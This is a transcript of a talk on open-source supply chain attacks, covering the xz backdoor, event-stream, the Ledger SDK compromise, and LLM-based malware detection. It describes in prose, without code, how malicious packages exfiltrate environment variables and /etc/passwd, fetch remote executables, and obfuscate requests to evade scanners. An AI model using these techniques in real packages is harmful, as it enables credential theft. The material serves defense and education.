The Dark Side of Open Source

Feross Aboukhadijeh &
53:41 min
Aug 27, 2024

Open source code makes up 90% of most codebases. How do you know if you can trust your open source dependencies? Software supply chain attacks have exploded over the past 12 months and they’re only accelerating in 2024 and beyond. We’ll dive into examples of recent supply chain attacks and what concrete steps you can take to protect your team from this emerging threat.

Feross Aboukhadijeh

Founder & CEO at Socket

Feross is founder and CEO at Socket, a developer-first security platform. Feross has worked in open source software for 10+ years writing some of the most-downloaded JavaScript packages. Feross is a lecturer at Stanford where he teaches CS 253 Web Security. Socket makes a developer-first security platform that prevents vulnerable and malicious open source dependencies from infiltrating your software supply chain. Thousands of organizations in every industry use Socket to safely discover, audit, and manage OSS at scale.

Transcript

Feross Aboukhadijeh 5:11 All right, thanks for having me here, Brian, it’s great to be here, and I think folks are in for a treat. This is a fun talk. We’re going to go through a bunch of cool stories of just different nefarious things that have happened in open source and and hopefully developers can leave this talk with some ideas about how to protect themselves and and also just with a little bit more of an understanding of the kind of things that go on in the wide world of of all these, you know, different package managers and different kind of places that we share open source. So to get started, let me just introduce myself. I’m for us. I started out in open source. I spent a long time in the JavaScript community. I wrote some of the most popular packages in that world. You know, the scale of NPM is crazy, and so, you know, very quickly you end up with a ton of downloads if you, if you contribute in that in that community. So I got to, I mean, the great part about that was I got a chance to witness firsthand the massive growth in the way that open source is used within companies. I remember that a time when there was a debate about whether open source or proprietary software was was better, and I’m happy to say that open source has definitively won that debate, and everybody uses it. I then moved into security and started getting interested in in that, and taught a class on web security at Stanford and and now I’m working at socket, where I’m helping to basically build this product that’s helping a ton of companies to defend their their apps from different types of software supply chain attacks, which which, as we’re going to see in this talk, are only increasing cool and so just a quick bit on what socket does so folks have the background, it’s a tool that helps protect your code from everyone else’s code. So it’s a tool that helps developers and security teams ship faster and spend less time on security busy work. And we not only fight vulnerabilities, but we also kind of provide the proactive protection from bad open source dependencies. And we’ve been doing really well. We have a ton of amazing customers. We’re a pretty new company, only a couple years old, but already we have some amazing customers that you can see here on the screen, and we’re protecting 300,000 code repositories. So we’ve been able to we’ve been able to help a lot of people, and hope this only continues to grow. So with that, let’s jump into the talk. So in the last five years, the way that we write software has undergone a massive shift. Today, it’s super common to see applications where over 90% of the code comes from open source dependencies, and that means that that’s code that you or your fellow developers didn’t write. So the average open source dependency has 79 transitive dependencies, and in a world where you’re building your application on 1000s of dependencies, software security is not just about your code, it’s about every piece of code that you depend on. And in this talk, we’re going to just focus on open source dependencies, but really your full software supply chain includes all the third party code you’re using, the APIs, the cloud services, even the dependencies in your operating system. You know, all of those parts and pieces make up the software that you ship to your users. And unfortunately, the open source ecosystem is under attack. And you know, I don’t mean to be hyperbolic here, but we have seen a pretty dramatic increase. Some estimates put it at a 700% increase in the past year, and we are seeing these attacks impact organizations of all types and sizes. So if you use open source in any way, and obviously you almost certainly do, then you know you’re going to be affected. It’s not really a matter of if, but when. And the reason I say that is that the packages that are that we’re seeing get compromised, are these, these really pervasive open source dependencies that pretty much everyone uses in one way or another. And so, you know, we need to think ahead a little bit to understand what steps can we take now so that when a popular package that we use is compromised, we won’t be, you know, in massive trouble, right? And so that’s what this talk is about. Now when we talk about software supply chain security, I know that can sometimes be super abstract, so I want to make this concrete for everyone and show you what does a software supply chain attack look like. And so this is a real example. So this is something socket detected. It’s not a very interesting attack, but it’s something we detected recently, and so let’s take a look at it. So let me help you see what’s going on in this file. I’m going to highlight a couple of parts of the file. Does that help? So if you look at these, these sections here, you can see that if a developer were to install this package, this malicious code would immediately run and it would exfiltrate or steal their environment variables, so things like your secrets, your tokens, your keys that are in the environment variables, and send that to this attacker controlled domain, which you can see is obfuscated there in the third line. So this is how a software supply chain attack directly leads to a breach. This attacker is basically they’re added, they added this code into an open source package. If anyone installs and runs this package, they’re going to steal all the all the tokens, and then that’s going to allow them to get access to further parts of of your you know, of the application. And I’ll mention a couple of examples of kind of big supply chain attacks, also, in case these jog your memory. But there was this big one called a SolarWinds hack. This happened a few years ago. It was a sophisticated attack that compromised a company called SolarWinds, and the attackers added in malicious code into SolarWinds software products, and they were able to then infiltrate the networks of 1000s of SolarWinds customers, including us, government agencies and large corporations. And while the like direct monetary damage is hard to quantify, the costs associated with all the investigation and the remediation and the increased cybersecurity measures ran definitely into the billions of dollars. And what’s interesting about this attack is it’s this picture here is very similar to how an attacker would compromise open source you’re just replacing the supplier here with the open source maintainer and and so the attacker can get code in into the open source project, and then it will affect the downstream customers. And this is actually what we saw very recently with the XZ utils back door. So probably most of you have heard about this. This was massive news a couple months ago, but I’ll just give a summary here, and before we kind of dig in so that everyone can kind of get up to speed. So what happened with XZ was a group likely backed by state, infiltrated an open source data compression project called xc by gradually winning over its main contributor, Lassie Colin. Over several years, they introduced a sophisticated, though not perfectly flawless backdoor aimed at compromising SSH servers, and the attack exploited a dependency of SSH on Linux system D, which relied on the compromised compression library. So this basically created a multi layered vulnerability and and it What fascinated everybody about this attack was just sort of how long it took, the duration of the plot, and kind of the way they created multiple credible personas, and they had just an insane amount of patience, so it suggested that this was like a highly organized effort, probably from a state and and that just the complexity and the way that they executed this made made a lot of folks in the community think that maybe it was the same team that was responsible for the SolarWinds breach, though, I think that you know information on this has evolved quite a bit since since the story first broke. So what I wanted to do now is just kind of show you what this attack looked like. I think it’s a fascinating example of what it looks like when somebody tries to infiltrate an open source project, and we can see what we can learn from this. So let me start by first mentioning so this isn’t more of an old school open source project. It’s been around for like, 15 years. Plus, I think you have a maintainer that’s been tirelessly maintaining this project over a really long time and and they use a mailing list to discuss changes to the project. And what you’re seeing here is this. Is the this, this attacker named GIA tan, who’s their first email to the mailing list. And you’ll notice they’re adding, adding a editor config file. So this is a very innocent change. It doesn’t really do anything but, but they’re just trying to, I guess, build trust with the maintainer and show that they can do some useful things. This email gets totally ignored by the maintainer.

A month later, there’s another email from the same contributor sending another innocent patch to the mailing list. This fixes kind of a build problem with reproducible builds. They continue to sort of send more patches along these lines, most of them getting totally ignored by the maintainer, because, again, this maintainer is pretty burned out and has been doing this for about 15 years. But then finally, in in in February 2022, so this is now two, three months later. Um, the first commit from this, this malicious actor has finally been merged. It’s an innocent commit. It’s just adding a simple null check. And the lesson from this, I think, is that the simpler the change, right, the simpler the fix, the easier it is for the for the maintainer to merge and so I think what the attacker learned here is that they should just fix a really, really simple bug that’s a two line fix that the maintainer can easily evaluate and then get that, get that merged. Then what we saw was a couple months go by and another persona shows up, Jigar Kumar, and this person sends a few emails to the list and complains about the first person geotans patch is not landing. You can see here, he says, patches spend years on this mailing list. There’s no reason to think anything is coming soon. So at this point, the maintainer, Lassie Colin, has already landed four of geotans patches. But, but what’s going on is, is sort of, they’re trying to, they’re sort of trying to create pressure on the maintainer to to maybe consider adding additional contributors. You can see Dennis, another persona, fake persona, comes in here a month later and adds in or mentions, you know this, this phrase that is the bane of all maintainers, which is, is this package still maintained? Which, which is, which is also building on the pressure on the maintainer. And I’ll just say that this is one of those things that if you, if you send it to to a maintainer, it’s one of the worst things to possibly receive from your community. I’ve experienced this myself on some of the projects I maintain, and it’s honestly super mean to send this to maintainer asking if their project is dead, because they’re probably feeling pretty overwhelmed and pretty, pretty, pretty, pretty hard on themselves already, and then to get a message saying, hey, is this thing dead? Isn’t, isn’t the nicest. And I think that this problem has gotten a lot worse in the new model of open source that we see as kind of kind of taken off with, with NPM and with with these newer ecosystems, which is that, rather than having a single project, like, like Linux that has, you know, dozens or hundreds of maintainers that all work on that single project, we have more of the the lower the latter model here, which is a single maintainer with with, with 10s or hundreds of projects and, and, and in this model, it’s very easy for the maintainer to get, to get overburdened and to not really be able to handle the load, the Maintenance load of their of their packages. And so what we see is the maintainer apologizes for the slowness, and they add this little message here that Jia tan has helped off list, meaning that they’re communicating over some type of chat system working on this and that that maybe he hints that that gstan might have a bigger role in the project in the future. And he says, it’s clear that my resources are too limited. So you can start to see here that the maintainer starting to come to the realization, due to the pressure from the different posters, that maybe they should, they should consider adding other folks to the project. And then here we see another two messages from this Jigar character, sending a pressure email over one month and no closer to being merged. Not a surprise, you can, you can sort of hear the the negativity in that same thing with this next message saying progress will not happen until there’s a new maintainer. And then here you can see last year replying and saying that he’s having some mental health issues and that, he’s again hinting that geotan might be able to help in the future. And then finally, we have the first commit here merged with geotan as the author. There was an earlier commit with him as the author, but the name wasn’t set correctly. And then finally, on, oh, sorry, I’m getting ahead of myself. Here, we still see more pressure being applied here. Jigar is saying, you know, you’re choking your repo. Why are you not changing maintainers? Dennis is also adding on another message, why not pass on maintainership? So they’re making it feel like there’s all this community pressure to pass on maintainership. Jigar at the very end here, even asking GIA why he can’t commit this directly himself. And then finally, we see here another three month gap, and then GIA tan finally posting the release summary for version 5.40 so this is, this is kind of the first moment that that the attacker has actually gone commit rights to the repository. And so you know what happens from here is, I’m not going to get into all the technical details of it, but essentially this, this compromise allows, you know this, this permission, allows geotan to then land a set of patches that that will eventually make their way into the SSH. Client and then allow anyone who, anyone who, anyone who has the right key material, to SSH into any server that’s running this version of SSH. And this could have affected a significant, like, double digit, percentage of all SSH servers in the world. This would have been, you know, this would have been horrible. But fortunately, some enterprising developers discovered this, this suspicious code, and basically traced it, traced it back to to some of the stuff that geotan was doing, and we were able to stop community. Was able to stop it before it was released and and only a few people that were running pre release versions of their operating system were affected. But this is a crazy story, because you can just see the number of personas, the length of time, the patience, right? And what I want to draw your attention to is there were months that went between some of these messages, right? If these people are working for a state which they which is currently the kind of best theory we have here that this level of persistence is almost certainly a almost certainly a state attacker. My question is, what were they doing for the for the month between those messages, right? They were obviously, they were obviously trying to work their way into other open source projects, right? That this was certainly not their only attempt. And so, you know, I would suspect that they were probably, you know, 20 or 50 other kind of similar email threads happening in different other, other open source projects. And it just remains to be seen, like, you know, what? Which of those you know, which of those will learn about so it’s, it’s kind of, it’s quite scary, honestly, to me, and I get, I really just wonder, what, what, you know, where have they actually succeeded? And so it’s, it’s something we need to do better, better as as a community. I’ll mention kind of one other, one other incident kind of very similar to this one. And why? What I think is so fascinating about this event stream incident is that so XZ was a very recent one. You know, we learned about it this year event stream. On the other hand, this is something that happened back in 2017 in the JavaScript community, and it has a lot of similarities to the XC incident. And it was really an early preview of some of these attacks we were going to see over the coming, you know, the coming five years, and, and, and, and, but it was, honestly, it was a lot simpler and a lot, a lot less sophisticated of an attack. But it’s kind of illustrative. So I’m gonna, I’m gonna show you kind of what that looks like. You’ll see it starts with a friendly feature suggestion from this developer, devinness, and then you can see the maintainer saying he doesn’t really use this module anymore, and he’s kind of not really planning to maintain it. And then eventually ends up getting an email from someone who says, Hey, I’d love to take over this package. And Dominic just gave me immediately, immediately gives access to the person who emails him. And I want to emphasize this is actually kind of, this is open source working as it should. You should get, you know, you should really be inviting in new contributors. You should be encouraging people to join the project. It creates a robustness and it and so nothing about this kind of really sets off that many, that many alarm bells. I mean, it’s, it’s normal for people to want to help and and so it’s kind of hard to spot this, but let’s continue with the story. So, so here you see that. You know, this is the part of the thread where folks have actually learned that there was a learned, learned that that the new maintainer added a back door into the into the package. But you’ll see here, Dominic’s reasoning for for why he why he did it, is, he said he emailed me and he wanted to maintain it, so I gave it to him. I don’t get anything from maintaining this module, and I don’t even use it anymore, and haven’t for years. And so you have a burned out maintainer not really using the code anymore. It’s, it’s totally reasonable for them to, you know, give that to somebody else to take care of,

and, and so, yeah, you know this, this is, this is kind of how it happens. And then the way the community found this, this is the part that’s also, it’s super similar to xz. It’s, it’s was discovered by a total accident. You have a developer who just noticed the deprecation warning getting printed out in the in their console, and they traced it back to the code that the attacker added. So the attacker used the deprecated function basically and and then they they found out that, oh, there is this. This, this highlighted code here, was added to the bottom of one of the files. And you can see the attacker, you know, you know, they were making a bunch of good changes, positive changes, but then eventually they they added in this, this sneaky bit of minified code. And if you unminified here as the kind of this this commenter did, you can pretty. Clearly see what’s going on. So it’s, there’s a payload that’s encrypted on, you know, with this data variable. And the first thing it does is it just decrypts the payload, and then it, it evals, it to to basically run the code and and it, it uses, it uses a one of these environment variables from NPM as a decryption key. And so basically the key comes from kind of the project that’s that the code is being run in. And yeah, and so it just got so we just got lucky as a community that the function that they used was deprecated right after they released the attack, and the community kind of did this, this, this massive search of all of all NPM packages, and found that it was actually this package, copay, that was being that was being targeted. And unfortunately, this was an electron application and and this bad dependency got bundled into the electron app and shipped out to the users of the electron app. So the malware exfiltrated the private keys from the from the crypto wallets of the users, and it, it would, it would, it would, it would, it would sneakily steal their crypto. And it was, it was sort of, I would say it was a very successful attack. Yeah, so, I mean, kind of the moral of the story here is that maintainers, in the course of doing their normal work, of maintaining their packages, will share access with people. And given enough time, and given, you know, burned out maintainers, and given enough, honestly, enough persistence, it’s possible for the bad guys to get into any open source project. That’s just a fact, enough, with enough time, enough patience, enough willingness to do good contributions over the course of months, years, they will eventually be able to build up trust with with really anyone and get in, get into, you know, the packages they want to get into. And so given that, given that developers can’t read every line of code in the dependencies, we need to kind of start thinking about ways that we as a community can do better here. And unfortunately, we’re not doing very good right now. It takes over 200 days to detect these malicious packages, on average. And this is according to some research in use next security conference, and 20% of the packages that are malicious actually are caught after 400 days. So it’s it’s really bad. The other problem, that’s it, that’s an issue here, is that even when stuff is found, oftentimes it isn’t added into into the National Vulnerability Database, and so there’s no reporting system. Obviously, for the really big attacks, they tend to get reported and discussed a lot, but for for the vast majority of the of the of the attacks that are happening, they never get even documented or cataloged in a standard location, so that we as a as developers can scan our code and our packages to see if we’re using any of those bad packages. So at socket, we’ve built a system where we can actually scan code in all the ecosystems today. That’s NPM, go, Python, Java, and we’re adding Ruby and rust in the coming months, and whenever we find a malicious package, we report it and get it taken down to protect the community. And we’re finding over 100 of these per week right now, so it’s quite, quite, quite a lot. So we’re doing our part, and then we’re providing kind of the data that we collect to anyone who signs up for socket. And we have a really generous free plan, and you can, you can just install it for free and get get protected today. So, so, yeah, that’s kind of, that’s kind of like a summary of some of the problem. I think one other attack that’s worth kind of maybe going into a bit that has some very, very interesting lessons, especially for for anyone who’s working on a web app, is the ledger attack. This happened back in December, and there’s a whole bunch of really cool lessons that came out of it, I think, for for folks that are that are using npm packages, that I like to dig into here, and then we’ll see how much time we have to go into some of the other stuff I had prepped, so we’ll see how we’re doing on time. But yeah, what happened here was hackers compromised the code used in a in a SDK published by ledger. And the ledger SDK got got this, you know, hacker that got access to the NPM account and and then they put code into there that would reroute funds to to a to the attacker’s wallet. And what I what it’s so interesting about it is that the users of the library in question were, they were doing everything right, in some sense right. They were they just installed the package that they were recommended to install by ledger. They. Initialized it with this await load Connect kit function call. And what it turns out, though, is that this was actually not, this was not initializing code that was part of the NPM package. What this actually was doing was it was loading, remotely, loading code off of a CDN and and and then kind of injecting that into the web page with a script tag. And they they did this in order to, as they say in their readme here, to allow them to push out updates to the library without having everyone, every one of their users need to update their NPM package. And this would allow them to kind of release builds faster. You can see the code they use to do this is here, and I’ll highlight a couple of the parts that are the most salient. You can see they’re injecting a script tag into the page. Now, the problem with this is it completely bypasses the lock file and and allows anyone who’s able to get code onto the CDN to to effectively change the code running on on everyone who’s using this library’s website at once. So when this happened, the ledger security team was able to deploy a fix and and upgrade, you know, the update the code on the CDN, but the malicious file ended up remaining live for about five hours while the CDN caches were, were, you know, was, while the cache was, was, was getting invalidated. And so what we learned from this is a few things for authors of packages, they should not be hot linking to JavaScript CDNs from within NPM packages, because this is going to completely bypass the lock file and take away control from the user of the open source package related to that, it’s really not a good practice to link to HTTP, Git or GitHub dependencies within a package json. This is effectively also bypassing the lock file by allowing the code that’s installed to be changed without a new version of a package being published. They also should have minimized who had access to NPM publish. They had a really a former employee that left the company or had access, and they forgot to remove it when that person left. So we need to audit our NPM access regularly, and ideally have some type of rigorous checklist based process for offboarding employees, when, when, when it comes, when an employee leaves the company. And then finally, if we, if we can, we should be using GitHub actions workflows to trigger publishes so that no individual developer actually needs access to NPM. On the user side, it’s important to not use packages that remotely load code and bypass your lock file. To the extent you could identify this, you should socket actually does have some alerts that we’ll be able to send you for packages that do those things. So if you’re using socket, you will get warned if any of your dependencies are doing this and that your dependencies so you should read the code in your dependencies as much time as you can afford to do that. It’s really a good idea and a good investment. Or you can use a security tool that just detects these types of risks, and you know, obviously socket would be one of those. And then just more general advice is, you know, to the extent that you can, you should try to use fewer dependencies. You should pin your dependencies, never use the wildcard operator and then avoid mutable package references. So again, those are the HTTP kit URLs, as well as any type of at latest, where you where you point to a tag, because those can be updated without your knowledge at any time, by the by the by the maintainer. And so if you do these things, you know, I think you’ll be in a much, much better shape to avoid as a kind of what happened to ledger.

And yeah. And so I guess, you know, I just think, you know, when we think about kind of, kind of security tooling in and how it works for developers, it’s a little bit today, it’s a little bit too hard to do the right thing. And so, you know, some of the things in here just require manual work, and they’re just a little bit too hard for everyone you know to do consistently. But I think to the extent that we can, we should try our best to do these things, because we’re going to be much safer. But I think, you know, like a lot of the legacy tools in this space, such as sneak such as dependabot, they don’t do a very good job of making it easy for developers to do the right thing. So in the case of this ledger attack, they were reporting that the package was safe for 24 hours after the package was actually compromised. And this is because the way they report their their security findings is based off of a very reactive approach of waiting for. Or an official vulnerability, or CVE to get issued and and so we just need to do better as a as a community. The other big problem is that we’re just kind of drowning in a flood of alerts. So for anyone who’s used NPM audit, you know that every time you install a package, you pretty much get this warning that you’re, you know you’re you’re using hundreds of vulnerabilities, and it’s gotten to the point where it’s, it’s flooded developers to the point where they just tune these out. And there was a very famous post about this a few years ago from Dan Abramov react fame, where he called NPM audit a stain on the entire NPM ecosystem, and he said the way that it works is totally broken. And I would agree with that. I think the problem with NPM audit and with vulnerability scanners in general is that they’re just sending way too many alerts to developers to the point where we can’t even use the information that it’s sending to us. We’re getting false positives. We’re getting warnings about vulnerabilities that aren’t even it’s in code that never even is used. It’s never even run. We’re getting warnings for developer dependencies which are never run in production. The severities are all inflated. Everyone is every everything’s a critical or a high, even though it’s more likely to be a medium or low for being honest. And at the same time, these tools don’t even alert about the things that we care about, like all the attacks I’ve been talking about this whole talk around supply chain attacks, malicious dependencies, typo squats, hijacked packages, backdoor dependencies, all this type of stuff. They don’t even warn about any of that stuff. So it’s really like we’re in this kind of worst of both worlds situation right now. But to be positive and to try to inject a little bit of positivity in here, I would say one of the things that’s helping us right now, and it’s really quite promising change, is that we’re we’re actually seeing that llms, large language models, are able to help and help us get a handle on on this problem. So I mentioned that the problem is developers can’t read every line of code of their dependencies. There’s not enough time for that. There’s too much code, there’s too many dependencies, but an LLM can read every line of code of your dependencies. And so at socket, we’ve been using llms for over a year now to do this, to try to help people to get a handle on the risks and their dependencies, and this type of generative AI approach enables us to identify threats that evade traditional analysis approaches, and to take code like what you see on the left and to turn it into a verdict like you see on the right, where we’re able to identify this is actually the the explanation that our system generated for the ledger attack that I mentioned earlier, where we were able to detect the obfuscated code that was added into the package and warn our users. So we’re starting to have good tools as defenders to finally try to automate some of this and take away the toil and help developers to do the right thing without having to do a ton of work. So I’m excited and encouraged by by that development, and I really am optimistic about how LMS can help us here. Cool. So I have a couple minutes here. I’m gonna, I think I’m gonna use the last, you know, little bit of time. I have to just show you a little bit of a sampling of some of the recent malware that we found, because I think some of it’s pretty cool, a pretty interesting so I just, we just, I just went through and grabbed a few examples of malicious packages published to different different ecosystems, mostly NPM, but but also some, I think there’s some Python in there as well. And the past week, just to show you, show you some examples of kind of like, what is, what is going on out there, on on these package managers, and hopefully it’s entertaining and interesting. So here’s a package that we found that runs a curl command and basically sends your Etsy password file, which is your your your system password file, to this ngrok HTTP URL. So this is just exfiltrating the this important system file. The LLM was able to identify it as malware and report that there’s data exfiltration of sensitive information. This is a very simple example, but, but it’s good to see that it works in those cases. It’s unfortunately, usually not that simple. So what we more often see published to these registries is something that code that looks like this, and this is code that’s been intentionally obfuscated or designed to be unreadable, and really as much as possible, to evade, to evade any type of static analysis or code analysis tools. But fortunately, an LLM, given that it operates on language and not not on on the AST of the code, is able to pick up on a few keywords in this file and kind of get a sense that some something nefarious might be. Going on here, and if you scroll down in the file, it also identifies some other things here, such as the fact that Discord is being contacted to download an exe file. We see child process which is used to run files. We see updater dot exe. There’s enough in here, plus the fact that it’s obfuscated that our LLM system here, our socket AI system was able to identify this as arbitrary code execution, downloading from untrusted sources and a significant security risk. So again, pretty exciting to see that we can, we can actually use AI to help us out here as developers. Now I want to show an example that I thought was quite entertaining. So this is another example of really deep obfuscation that an attacker attempted. And in this package, you’ll see that they are, they are using, on this line here, a little bit of obfuscation to hide what’s going on. So I want to draw your attention to, excuse me, I want to draw your attention to the type function. And the type function here is, is actually returning a string that is going to basically run. It’s going to do it, it’s going to do a it’s going to make an HTTP request. But they wanted to hide from a specific analysis tool that looks for the string HTTP dot request, or HTTP dot get, or HTTP dot post. And so they use this, this kind of complicated obfuscation technique, in order to hide so if I go to the type function here, we can try to figure out what this code is doing. So I’ll draw your attention to here at the bottom of the function, it’s passing in 01, and two into the prop getter function, and then the prop getter function is calling the prop value function with the the number in question, which is prop but then it’s also passing in Prop getter, which is the function that we’re running inside of. So it’s it’s passing a reference to the the function here itself into prop value, which is sort of weird, and and then prop value takes the function that’s passed in, turns it into a string. So now we’re looking at a function as a string splits on the new lines and then filters down to just the lines that start with slash, slash. So what that means is that it’s actually targeting the comment inside the function. So it’s, it’s looking at these comments here, West question in Ireland. And it’s, it’s trimming, trimming those down to to basically chop out the words West question in Ireland, which is kind of odd. And then it’s using the indexes down here to chop those strings down further to select specific sub, sub strings within those strings. So it’s selecting S, T, Q, U, E and R, E and and then it reverses those and joins them together. And if you will notice reversing that turns turns into the string, R, E, Q, U, E, S, T, in reverse, that spells the word request. So all this code just to create the string request, that’s what gets returned here. And so effectively, this line turns into HTTP request, and that that actually bypasses a bunch of, you know, static analysis that’s looking for, you know, HTTP dot request.

But fortunately, our LM is not fooled by that. So the AI systems, the Gen AI systems, are able to look at that code and to say, hey, that actually looks like it’s it’s sending environment variables, it’s obfuscating the nature of the prop value function, and there’s some malicious data exfiltration. So it’s pretty cool stuff. I really think that AI is going to help us out a lot here, and this is kind of the path forward for starting to detect and stop these kinds of attacks. And I think this is really just the beginning of what we’re going to be able to be able to do with this technology as defenders and as developers. So excuse me, I’m sorry I’m getting like, some kind of a cough developing right now. I’m trying my best not to cough here, but, but yeah, that’s pretty much it for my talk. I think basically that the lesson here for us as Defenders is that open source risk is really a it’s a complicated and multifaceted issue. There are, there are. A lot of factors that go into whether an open source package is safe and good to use. It’s really a lot more than just the vulnerability stuff that we’ve been that we’ve we’ve been seeing from a lot of the tooling that we’re familiar with as developers, there’s so much more that you care about as a developer. Like is the package? Does it have good quality? Right? Is it maintained? Is it? Is it is the author trustworthy? What kind of behavior does the code actually do at runtime? Is the license safe? And so we really want to kind of ask ourselves. We want to ask ourselves these questions when we look at open source and whether we whether we want to use this, those packages or not, and we, we should as much as possible zoom out and try to have a broad view of open source risk and think about as many of these factors as we can. So with that, I will, I will say thank you and and I’ll just also mention feel free to get in touch if you ever want to reach out. And I love talking about this stuff. So if you’re if you have any questions for me and you want to talk, I’m happy to chat with anyone. You can contact me. Email is probably the best, and feel free to get in touch. And otherwise, I think we’ll have a few minutes for questions here. So thank you for your time, everybody.

Brian Rinaldi 46:16 Yeah, that was awesome. That last one was really interesting. Because, I mean, I think, you know, it’s at a certain point most developers, if they were asked with kind of verifying this, would have kind of gotten lost intentionally in that, the kind of maze they created of obfuscating that request, you know, and overlooked it. But yeah, that was pretty impressive.

Feross Aboukhadijeh 46:44 Yeah, I agree. I was shocked at some of the things that the llms have been able to identify. A related one. That was also relatively shocking was base 64 encoded strings. You would think like, how could it, you know, how could it unbase 64 encode something? But I think there’s been enough like training data, where it’s looking at base 64 encoding coded strings, that it actually has kind of, maybe, you know, haven’t verified this, so don’t quote me on it, but I’ve seen instances where it looks at a base 64 string and it just says, Oh yeah, it’s, it’s, it’s running this shell command. And they actually tried to using base 64 to hide it, but the LM just looked at that and was like, oh yeah. I can decode that and figure out what it’s doing.

Brian Rinaldi 47:26 Yeah. I mean, you know, I it is interesting that that, you know, I think this is one of those things where AI can actually really be helpful, because it’s not, it’s, it’s, it’s doing a kind of a repetitive task, as kind of difficult as you said. Like, I mean, the the amount of of lines of code in dependencies, especially, I don’t know, I’m mostly a JavaScript developer, so like, I feel like maybe it’s a matter of perspective, but I feel like the JavaScript community is almost like it’s just overloaded in dependencies at this point that we I mean, yeah, you could go over it, but, like, you could, it could be somebody’s full time job just digging through all the dependencies all the time, and there’s always some new dependency added and etc. So it’s a really tough task to ask somebody, but a machine can do it for you better. And I mean,

Feross Aboukhadijeh 48:20 to be clear, I don’t think today that the machine is necessarily doing as good a job as the human would. But if you’re going to do if the alternative is to do nothing right and to just install random code from random people on the internet, which is one way of describing open source, right, and using it without any type of vetting, I think, you know, having some kind of automation that can do a pretty good job is a really good starting point, and especially when there isn’t really much hasn’t really been much in the way of scanning for these types of issues. In the past, there’s actually a lot of low hanging fruit where, you know, the bad guys haven’t had to try very hard to hide their tracks, because just no one has really been looking and so a lot of the attacks are, they’re so easy to catch, in the sense of, like, if a human were to look at the at the code, you know, like any of the code I showed you up there, right? If you were to open up one of your, your your packages in, you know, Go to Node modules in your editor, and just open up one of those files, and you saw that kind of code, you’d be like, very, you’d be very mystified about what, what? Why is that? Why is this code like just, you know, obfuscated block of all these, these weird functions, you know, you could kind of tell right away, as a human, something is off, and so the LLM is able to do that pretty well, right? And help out.

Brian Rinaldi 49:38 Yeah, no. I mean, it’s, there’s a lot I’ve even years ago in which you brought up in your last slide. Like, I think it was like four or five years ago. Not much has changed since then. I remember giving a talk regularly on, like, on the license issues, specifically because most developers I talked to didn’t seem to even know what licenses they were using. And this is not. Obviously a risk, and a similar kind of risk, but it’s a different kind of risk for like, when you’re working at a company and you and you put a license, you know, in there that you aren’t aware, you know, that kind of put you at risk of litigation instead. But even even that was like getting getting folks to run, like, a simple license check prior to, like, installing something was difficult. So I can imagine, like, getting them to go through the dependencies, looking for stuff is is also incredibly difficult.

Feross Aboukhadijeh 50:33 Yeah.

Brian Rinaldi 50:36 But I do have, like, one question I have, which is, kind of get, not getting at the actual risk in the sense of, like, what, how do we what can we do for maintainers that helps to mitigate some of like, because I agree, like, part of our problem is that we keep putting more burden on these maintainers and and I don’t know that. There’s a lot of of you know things where you know, I think the burden is increasing without necessarily anything to mitigate that increasing burden. We’re relying on this stuff more, and yet we’re not really providing for the people creating it in the way we should. What do you think are some things we could do to kind of as a community, to help solve

Feross Aboukhadijeh 51:24 that. It’s a great question. I think, I mean, I have, I have a lot of opinions on this topic, because, you know, I’ve been a maintainer for a really long time, and I ended up deciding that, you know, doing open source full time wasn’t something that I could do anymore. I’d love to live in a world where, in the future, someone could decide to just do open source. And if you think about the value they’re providing to the world by just working on open source and sharing this code with the whole with all the companies that use it, with all the different folks that are using this code in different ways, the value they’re providing to society is, I think, arguably, more than you know, you’d get as a as a developer, as just a developer working on closed source code at a single company that helps one company, right? So, given that they’re providing that, you know, much value to the world, it seems like there ought to be some way to compensate them. You know, on at the level of of what you’d get at a job, right? If you’re providing more, you know, arguably more value than you can working on private code. Why can’t we compensate maintainers in a similar way? And there’s a whole bunch of reasons for that that are really hard to solve. That it’s like, I mean, part of the main problem is if you give away everything for free, and you put an MIT license on it, and then you turn around and say, Please pay me. You. It’s kind of like, you kind of already given away the leverage in the in the in the, you know, in the relationship. So most companies just won’t pay in that situation, right? Especially when you frame it as a donation, which is how most people do it, it’s really hard for a company to, you know, for a manager, or for someone, someone who, even if they care, they want to do the right thing, they can’t really go and say, Hey guys, we should donate, you know, I want to donate the company’s money to this random person. Like, it doesn’t really like they can buy products, you know, they can. They can pay for support. They can. They can pay for, you know, but they need an invoice, and it needs to be, like, a formal process. You can’t just be like, I’m gonna go donate money from the company’s bank account to this random open source person who I like, or who might even be my friend, you know, something like that. You can’t really do that. So that way it’s, the way it’s been framed is, and there’s, you know, there’s obviously people doing good efforts here, around this, I think open collective and tidelift, there’s just some folks doing some some experimentation, and some in some innovation in the model to make it easier for companies to pay and to help. So I think paying, paying is one big part of it. Then there’s also, like, just maintainers themselves, I think kind of create some of the, some of the, some of the burden. I mean, I remember, when I was a maintainer, I was my own worst enemy. In some ways. I treated my GitHub issues list as my to do list, and I let, effectively, anyone in the world add items to my own personal to do lists. And that grew faster than I could fix the issues, and it created, you know, a lot of stress, and a lot of of just feeling of like, Oh, I’m doing a bad job, even though I was like, working, you know, more than eight hours a day, like, for free, giving away all my work. And I was like, I’m not a bad maintainer, you know, actually, you know, that’s not the right framing of things. And so there’s a lot of, I think a lot of maintainers I see it get burned out because they’re, they’re, um, they feel the burden of the of the people that are relying on their code, and they and they take it very personally, you know, they really want to do the right thing and and so that that can create a lot of stress. So there’s a mindset shift, I think that’s helpful there, which is just like, you know, you read the terms of the MIT license, it literally says this code is provided as is right, as. Is no guarantees. It’s like, if we really had that type of a philosophy around it, where it’s like, I there’s no support contract on this if you want support, you know, that’s a different thing. You know, maybe you should pay me for that. That can, I think, really help. The problem is, I think, is the mixing of the MIT license, kind of the standard open source licenses, and legally, what they what they entitle the user to which is not much. It’s just, I mean, it’s in terms of support, and there’s nothing that they’re entitled to there. Whereas there’s this sort of social expectation with GitHub, that if you have an issue tracker, that you’re going to be reading the issue tracker, that you’re going to be engaging, that you’re going to be addressing it. And so that creates this type of, you know, this sort of almost like a unwritten social obligation, or social expectation that you’re going to be there and you’re going to support the users that show up and and then people get all confused about what is open source? Is open source the license? Is it the this legal concept, or is open source the community? Is it the idea of having an open issue tracker, because, you know, you have companies like Apple that just release open source code because they’re legally required to, but they put it in a zip file on a random URL on their website that no one visits, and they call it open source. And technically, legally, you know, it is open you know, it is open source, but there’s no community. They don’t take contributions. It’s, it’s so then, you know, and so people think, when they say open source, they really think of a maintainer who will reply to my issues and will read my PRs and will be engaged and will take contributions. And so, you know, anyway, it’s super complicated. I don’t think we’re going to solve it here, but I am. I think I don’t know, government money 